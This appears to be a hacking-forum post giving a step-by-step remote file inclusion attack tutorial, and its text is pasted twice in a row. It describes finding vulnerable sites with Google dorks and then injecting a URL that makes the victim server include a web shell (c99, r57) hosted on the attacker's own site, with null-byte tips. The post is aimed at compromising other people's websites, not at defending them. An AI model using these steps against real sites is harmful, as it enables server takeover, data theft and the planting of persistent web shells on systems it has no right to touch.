HomeLatest topics
Hacking Website using RFI Method
Page 1 of 1 • Share
- Libin lal
σωηεя
- Posts : 16
Join date : 2015-09-15
Age : 30 -
Libin lal Wed Sep 16, 2015 7:51 pm
What Is RFI(Remote File Inclusion)
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/ManipulationRFI is a very uncommon vulnerability due to excessive patches and updates on websites.
S0 here we go _follow me____!!!!!
Finding a Vulnerable Site using Google Dorks and Checking for vulnerability
Here i provided a link for finding vulnerable sites using Google Dorks For RFI
Now for testing whether our site is vulnerable to RFI or not we will uss the following command
*http://www.targetsite.com/index.php?page=www.google.com*
Suppose our target site is*http://www.aabbcc.com *. So for checking our url will become something like diz
*http://www.aabbcc.com/v2/index.php?page=http://www.google.com*
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then the site is not vulnerable to RFI.
Exploiting The Vulnerability
For that you will need to upload your shell
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
[You must be registered and logged in to see this link.]
Now comes adding our shell to victims website
Okay, once we are at the vulnerable page (*[You must be registered and logged in to see this link.]
we will have to replace*"http://www.google.com* *"* and include our own file(in my place its
(*http://www.oursite.com/shell.txt*)
Our new link should look like this.
*http://www.aabbcc.com/v2/index.php?page=**[You must be registered and logged in to see this link.]
*NOTE--> *The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".
* *Ok so we uploaded our shell successfully in the target site and i think you all know that what all you can do after uploading shell to the site Smile
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:
* Code execution on the web server
* Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
* Denial of Service (DoS)
* Data Theft/ManipulationRFI is a very uncommon vulnerability due to excessive patches and updates on websites.
S0 here we go _follow me____!!!!!
Finding a Vulnerable Site using Google Dorks and Checking for vulnerability
Here i provided a link for finding vulnerable sites using Google Dorks For RFI
Now for testing whether our site is vulnerable to RFI or not we will uss the following command
*http://www.targetsite.com/index.php?page=www.google.com*
Suppose our target site is*http://www.aabbcc.com *. So for checking our url will become something like diz
*http://www.aabbcc.com/v2/index.php?page=http://www.google.com*
If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then the site is not vulnerable to RFI.
Exploiting The Vulnerability
For that you will need to upload your shell
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.
So once you have uploaded your shell to your website, it should look like this.
[You must be registered and logged in to see this link.]
Now comes adding our shell to victims website
Okay, once we are at the vulnerable page (*[You must be registered and logged in to see this link.]
we will have to replace*"http://www.google.com* *"* and include our own file(in my place its
(*http://www.oursite.com/shell.txt*)
Our new link should look like this.
*http://www.aabbcc.com/v2/index.php?page=**[You must be registered and logged in to see this link.]
*NOTE--> *The question mark (?) is important. If the site was vulnerable you should now see your shell embedded to the webpage. You can then do as you wish with it. Sometimes "shell.txt?" may not be enough, we may need to use null bytes for it to execute successfully. If you receive an error from "shell.txt?" try "shell.txt?".
* *Ok so we uploaded our shell successfully in the target site and i think you all know that what all you can do after uploading shell to the site Smile
Similar topics
Create an account or log in to leave a reply
You need to be a member in order to leave a reply.
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum
» How to add contacts to WhatsApp
» Fresh Dork List For SQL Injection
» How To Bypass Phone and SMS verification of Any Website
» Burn Keylogger
» Hacking Website using RFI Method
» Forum Rules